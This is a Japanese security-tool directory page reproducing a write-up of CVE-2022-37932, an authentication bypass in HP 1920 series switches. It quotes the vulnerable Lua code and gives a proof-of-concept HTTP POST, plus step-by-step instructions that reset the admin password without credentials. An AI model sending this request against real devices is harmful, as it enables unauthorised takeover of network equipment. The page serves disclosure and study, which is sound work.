Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-37932 | Kitploit
ツール/GitHubGitHub/tim-hoekstra/cve-2022-37932
IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubtim-hoekstra/cve-2022-37932

CVE-2022-37932

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

HPスイッチファームウェア認証バイパス脆弱性

CVE-2022-37932

ファームウェアバージョン: PD.02.21
影響を受けるデバイス: HP 1920シリーズスマートマネージドスイッチ

概要

このリポジトリは、ファームウェアバージョンPD.02.21を実行するHP 1920シリーズスマートマネージドスイッチにおける重大な認証バイパス脆弱性を文書化しています。この脆弱性により、認証されていない攻撃者が事前認証なしに管理者パスワードを変更でき、実質的にデバイスを完全に乗っ取ることが可能になります。

技術的詳細

この脆弱性は、デバイスのデフォルトパスワードの変更を処理する/login/default_password_cfg.luaスクリプトに存在します。このスクリプトは:

  1. ユーザーが認証されているかどうかを確認せずにフォームPOSTリクエストを受け入れます
  2. oldPwdパラメータがデフォルトパスワード(空/ブランク)と一致することのみを検証します
  3. POSTパラメータに基づいてユーザーのパスワードを直接変更します

脆弱なコード

default_password_cfg.lua内の主要な脆弱性のある箇所:

root@kitploit:~
if (request_method == 'POST') then
  -- No authentication or session checks!
  
  local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
  -- ...

  if form_post.oldPwd ~= defaultPassword then
    errorStatus = "401 Unauthorized"
    errorText = label.old_password_mismatch
  else
    -- Proceeds to change password
    -- ...
  end
end

このスクリプトには、重要なセキュリティ制御が欠けています:

  • セッション検証なし
  • CSRF保護なし
  • レート制限なし
  • 認証なしでのパスワード変更機能への直接アクセス

概念実証(PoC)

攻撃者は、単純なHTTP POSTリクエストを使用してこの脆弱性を悪用できます:

root@kitploit:~
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]

注:デフォルトパスワードがブランクであるため、oldPwdパラメータは空のままです。

影響

この脆弱性により、認証されていない攻撃者は以下が可能になります:

  1. 資格情報を一切知らなくても管理者パスワードを変更する
  2. デバイスに対する完全な管理制御を獲得する
  3. スイッチを設定し、ネットワーク設定を変更し、ネットワーク全体を侵害する可能性がある

悪用手順

  1. ネットワーク上で脆弱なHP 1920シリーズスイッチを見つけます
  2. 細工されたHTTP POSTリクエストをデバイスに直接送信します
  3. 管理者パスワードが攻撃者制御の値に変更されます
  4. 攻撃者は新しいパスワードと完全な管理者権限でログインできるようになります

クレジット

この脆弱性を最初に発見した人物を調査する時間がなかったので、単に概念実証(PoC)を公開しているだけです。

法的免責事項

この情報は教育目的のみで提供されています。著者は、この情報の誤用について一切責任を負いません。脆弱性をテストする前に、必ず適切な許可を取得してください。

ツールをダウンロード